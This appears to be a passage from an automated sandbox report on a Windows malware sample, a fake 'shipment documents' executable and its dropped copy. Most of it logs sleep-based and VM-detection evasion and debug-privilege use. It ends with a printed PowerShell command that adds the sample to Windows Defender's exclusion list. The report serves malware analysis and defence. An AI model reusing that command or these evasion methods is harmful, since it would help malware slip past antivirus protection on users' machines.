Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594952
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594496
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594221
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594073
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9520 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9098 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Window / User API: threadDelayed 5031 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Window / User API: threadDelayed 4826 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Window / User API: threadDelayed 4456
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Window / User API: threadDelayed 5387
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 7320 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep count: 9520 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -26747778906878833s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 2688 Thread sleep count: 5031 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599805s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 2688 Thread sleep count: 4826 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599024s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598126s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -598000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597669s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597533s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597387s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597275s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597154s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -597047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -596062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595187s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -595068s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594624s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -594406s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 7868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3384 Thread sleep count: 4456 > 30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3384 Thread sleep count: 5387 > 30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599779s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599292s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599175s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -599054s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598836s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598607s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598281s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598171s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -598062s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597953s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597843s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597624s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597515s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597296s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597187s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -597078s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596968s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596859s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596740s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596280s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595844s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595719s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595609s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595281s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595172s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -595062s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594952s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594843s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594625s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594496s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594221s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668 Thread sleep time: -594073s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599805 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599687 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599578 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599469 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599359 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599250 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599140 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599024 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598796 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598687 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598578 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598126 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598000 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597669 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597533 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597387 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597275 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597154 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596390 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596281 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596172 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595843 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595068 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594624 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594515 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599779
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599292
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599175
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599054
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598836
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598607
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598171
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597624
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597296
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597078
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596859
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596740
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596280
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594952
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594496
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594221
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594073
Source: rShipmentDocuments.exe, 00000009.00000002.4135329351.0000000000E18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: ZOlmYtPdlO.exe, 0000000A.00000002.1773124497.00000000080CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\T
Source: ZOlmYtPdlO.exe, 0000000A.00000002.1764660892.00000000009D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: ZOlmYtPdlO.exe, 00000010.00000002.4136109973.0000000001429000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9328 LdrInitializeThunk, 9_2_068F9328
Enables debug privileges
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
